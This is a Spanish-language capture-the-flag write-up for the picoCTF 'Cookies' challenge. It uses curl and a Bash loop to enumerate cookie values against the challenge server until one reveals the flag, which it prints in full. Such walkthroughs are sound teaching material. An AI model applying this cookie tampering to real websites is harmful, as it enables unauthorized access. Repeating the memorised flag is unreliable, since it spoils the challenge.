Cookies
2 minutos de lectura
Se nos proporciona una página web que pregunta por una cookie:
Mirando en las herramientas de desarrollador, vemos que tenemos una cookie name=-1. Si ponemos snickerdoodle como el campo de texto sugiere, la cookie cambiará a name=0:
Vamos a modificar el valor de la cookie usando curl y mostrar solo el mensaje:
$ curl mercury.picoctf.net:27177/check -sH 'Cookie: name=0' | grep -oE '<b>.*?</b>'
<b>I love snickerdoodle cookies!</b>
Ahora vamos a usar un bucle en Bash para ver si algo cambia al poner otro valor como cookie:
$ for i in {0..20}; do echo -n "$i: "; curl mercury.picoctf.net:27177/check -sH "Cookie: name=$i" | grep -oE '<b>.*?</b>'; done
0: <b>I love snickerdoodle cookies!</b>
1: <b>I love chocolate chip cookies!</b>
2: <b>I love oatmeal raisin cookies!</b>
3: <b>I love gingersnap cookies!</b>
4: <b>I love shortbread cookies!</b>
5: <b>I love peanut butter cookies!</b>
6: <b>I love whoopie pie cookies!</b>
7: <b>I love sugar cookies!</b>
8: <b>I love molasses cookies!</b>
9: <b>I love kiss cookies!</b>
10: <b>I love biscotti cookies!</b>
11: <b>I love butter cookies!</b>
12: <b>I love spritz cookies!</b>
13: <b>I love snowball cookies!</b>
14: <b>I love drop cookies!</b>
15: <b>I love thumbprint cookies!</b>
16: <b>I love pinwheel cookies!</b>
17: <b>I love wafer cookies!</b>
18: <b>Flag</b>
19: <b>I love macaroon cookies!</b>
20: <b>I love fortune cookies!</b>
Genial, vemos que name=18 mostrará la flag:
$ curl mercury.picoctf.net:27177/check -sH 'Cookie: name=18' | grep -oE 'picoCTF{.*?}'
picoCTF{3v3ry1_l0v3s_c00k135_064663be}